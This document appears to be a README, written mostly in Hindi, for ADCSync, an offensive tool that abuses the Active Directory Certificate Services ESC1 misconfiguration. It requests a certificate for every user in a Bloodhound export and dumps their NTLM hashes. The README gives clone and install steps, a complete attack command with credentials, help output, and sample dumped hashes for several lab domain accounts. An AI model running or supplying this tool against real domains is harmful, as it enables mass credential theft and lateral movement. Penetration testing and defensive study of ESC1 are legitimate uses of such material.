
ESC1 का उपयोग करके एक अस्थायी DCSync करें और हैश डंप करें
यह एक टूल है जिसे मैंने ESC1 का उपयोग करके DCSync करने के लिए जल्दी से तैयार किया है। यह काफी धीमा है लेकिन DRSUAPI या Volume Shadow Copy का उपयोग किए बिना एक अस्थायी DCSync हमला करने का एक प्रभावी तरीका है।
यह टूल का पहला संस्करण है और मूल रूप से हर उपयोगकर्ता के खिलाफ Certipy चलाने की प्रक्रिया को स्वचालित करता है। इसमें अभी भी बहुत काम की ज़रूरत है और मैं भविष्य में प्रमाणीकरण विधियों के लिए और अधिक सुविधाएँ जोड़ने और कमजोर टेम्पलेट खोजने की प्रक्रिया को स्वचालित करने की योजना बना रहा हूँ।
python3 adcsync.py -u clu -p theperfectsystem -ca THEGRID-KFLYNN-DC-CA -template SmartCard -target-ip 192.168.0.98 -dc-ip 192.168.0.98 -f users.json -o ntlm_dump.txt
___ ____ ___________
/ | / __ \/ ____/ ___/__ ______ _____
/ /| | / / / / / \__ \/ / / / __ \/ ___/
/ ___ |/ /_/ / /___ ___/ / /_/ / / / / /__
/_/ |_/_____/\____//____/\__, /_/ /_/\___/
/____/
Grabbing user certs:
100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 105/105 [02:18<00:00, 1.32s/it]
THEGRID.LOCAL/shirlee.saraann::aad3b435b51404eeaad3b435b51404ee:68832255545152d843216ed7bbb2d09e:::
THEGRID.LOCAL/rosanne.nert::aad3b435b51404eeaad3b435b51404ee:a20821df366981f7110c07c7708f7ed2:::
THEGRID.LOCAL/edita.lauree::aad3b435b51404eeaad3b435b51404ee:b212294e06a0757547d66b78bb632d69:::
THEGRID.LOCAL/carol.elianore::aad3b435b51404eeaad3b435b51404ee:ed4603ce5a1c86b977dc049a77d2cc6f:::
THEGRID.LOCAL/astrid.lotte::aad3b435b51404eeaad3b435b51404ee:201789a1986f2a2894f7ac726ea12a0b:::
THEGRID.LOCAL/louise.hedvig::aad3b435b51404eeaad3b435b51404ee:edc599314b95cf5635eb132a1cb5f04d:::
THEGRID.LOCAL/janelle.jess::aad3b435b51404eeaad3b435b51404ee:a7a1d8ae1867bb60d23e0b88342a6fab:::
THEGRID.LOCAL/marie-ann.kayle::aad3b435b51404eeaad3b435b51404ee:a55d86c4b2c2b2ae526a14e7e2cd259f:::
THEGRID.LOCAL/jeanie.isa::aad3b435b51404eeaad3b435b51404ee:61f8c2bf0dc57933a578aa2bc835f2e5:::
ADCSync, Active Directory वातावरण में उपयोगकर्ता खातों से NTLM हैश डंप करने के लिए ESC1 एक्सप्लॉइट का उपयोग करता है। टूल पहले पास किए गए Bloodhound डंप फ़ाइल से हर उपयोगकर्ता और डोमेन प्राप्त करेगा। फिर यह प्रत्येक उपयोगकर्ता के लिए Certipy का उपयोग करके एक अनुरोध करेगा और उनकी PFX फ़ाइल को प्रमाणपत्र निर्देशिका में संग्रहीत करेगा। अंत में, यह प्रमाणपत्र के साथ प्रमाणीकरण करने और प्रत्येक उपयोगकर्ता के लिए NT हैश प्राप्त करने के लिए Certipy का उपयोग करेगा। यह प्रक्रिया काफी धीमी है और इसे पूरा होने में कुछ समय लग सकता है, लेकिन NTLM हैश डंप करने का एक वैकल्पिक तरीका प्रदान करता है।
git clone https://github.com/JPG0mez/adcsync.git
cd adcsync
pip3 install -r requirements.txt
इस टूल का उपयोग करने के लिए हमें निम्नलिखित चीज़ों की आवश्यकता है:
# python3 adcsync.py --help
___ ____ ___________
/ | / __ \/ ____/ ___/__ ______ _____
/ /| | / / / / / \__ \/ / / / __ \/ ___/
/ ___ |/ /_/ / /___ ___/ / /_/ / / / / /__
/_/ |_/_____/\____//____/\__, /_/ /_/\___/
/____/
Usage: adcsync.py [OPTIONS]
Options:
-f, --file TEXT Input User List JSON file from Bloodhound [required]
-o, --output TEXT NTLM Hash Output file [required]
-ca TEXT Certificate Authority [required]
-dc-ip TEXT IP Address of Domain Controller [required]
-u, --user TEXT Username [required]
-p, --password TEXT Password [required]
-template TEXT Template Name vulnerable to ESC1 [required]
-target-ip TEXT IP Address of the target machine [required]
--help Show this message and exit.